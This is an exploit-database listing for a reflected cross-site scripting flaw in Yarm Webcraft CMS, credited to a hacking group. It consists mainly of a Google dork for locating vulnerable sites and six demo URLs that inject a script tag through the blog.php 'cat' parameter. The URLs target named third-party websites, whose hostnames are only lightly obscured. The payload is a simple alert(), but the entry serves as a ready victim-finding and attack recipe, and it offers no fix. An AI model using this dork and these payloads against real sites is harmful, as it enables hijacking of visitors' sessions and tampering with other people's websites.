Yarm Webcraft CMS Cross Site Scripting

2015.12.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : Yarm Webcraft CMS Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.yarm-webcraft.co.uk/ # Google Dork : "Website by Yarm Webcraft " inurl:blog.php # Date: 2015/12/17 # Version : All # ###################### # # Demo: # #http://www.maeXve-haran.co.uk/blog.php?ac=post&id=2&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # #http://www.phXilip-caveney.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # #http://gavin-Xweightman.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # #http://wwwX.thegamingacademy.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # #http://wwXw.clarebeaton.com/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # #http://mXedisport-training.co.uk/blog.php?ac=post&id=32&cat=%22%3E%3Cscript%3Ealert%28%22Mobham%22%29%3C/script%3E&p=1 # # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top